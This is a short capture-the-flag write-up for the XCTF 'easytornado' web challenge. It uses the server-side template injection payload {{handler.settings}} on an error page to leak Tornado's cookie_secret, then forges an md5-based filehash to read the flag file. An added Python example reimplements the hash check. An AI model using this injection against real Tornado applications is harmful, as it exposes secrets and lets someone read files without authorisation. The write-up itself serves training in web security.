攻防世界 (XCTF) Web advanced section: easytornado
The challenge description gives a hint: the Tornado framework.
Open the link.
It lists 3 files:
1. flag in /fllllllllllllag
2. render, which may point to SSTI (server-side template injection)
3. md5(cookie_secret+md5(filename))
Entering /fllllllllllllag in the URL goes straight to an error.
Use the handler.settings object to get the cookie secret (cookie_secret).
Enter /error?msg={{handler.settings}} in the URL.
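According to the hint, the filehash value is an md5 hash.
First hash the filename, i.e. /fllllllllllllag, with md5, then concatenate that with the cookie_secret and md5 the whole string.
Append /file?filename=/fllllllllllllag&filehash=4c2a176027661a2ee12711b55362af2a to the URL.
This returns the flag.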
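The filehash check from hint 3, written out as an added example (not code from the challenge or from Tornado). SAMPLE_SECRET, /other.txt, check_request and build_url are constructed for illustration, and the inner md5 is assumed to be used as a lowercase hex string.

```python
import hashlib
import hmac
from urllib.parse import urlsplit, parse_qs

# Constructed placeholder; the real cookie_secret is not shown on the page.
SAMPLE_SECRET = "constructed-cookie-secret-0000"


def md5_hex(text):
    """Lowercase hex md5 of a UTF-8 string."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def filehash(cookie_secret, filename):
    # Hint 3: md5(cookie_secret + md5(filename)).
    # Assumption: the inner digest is concatenated as a lowercase hex string.
    return md5_hex(cookie_secret + md5_hex(filename))


def check_request(cookie_secret, url):
    """Return (filename, ok) for a /file?filename=...&filehash=... URL."""
    query = parse_qs(urlsplit(url).query)
    filename = query.get("filename", [""])[0]
    supplied = query.get("filehash", [""])[0]
    expected = filehash(cookie_secret, filename)
    # Constant-time comparison on bytes, so non-ASCII input cannot raise.
    ok = hmac.compare_digest(expected.encode(), supplied.lower().encode())
    return filename, ok


def build_url(cookie_secret, filename):
    """URL in the shape used on the page, with a matching filehash."""
    return "/file?filename=%s&filehash=%s" % (
        filename, filehash(cookie_secret, filename))


if __name__ == "__main__":
    good = build_url(SAMPLE_SECRET, "/fllllllllllllag")
    # A hash computed for one file does not validate for another filename.
    reused = ("/file?filename=/other.txt&filehash="
              + filehash(SAMPLE_SECRET, "/fllllllllllllag"))
    missing = "/file?filename=/fllllllllllllag"
    for url in (good, reused, missing):
        print(url, "->", check_request(SAMPLE_SECRET, url))
```

The check binds each hash to one filename, but it only holds while cookie_secret stays private, which is why the handler.settings output on the error page is enough to pass it.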
Key points: the Tornado framework, using the handler.settings object to get the cookie_secret, md5 hashing
2020.7.28 公瑾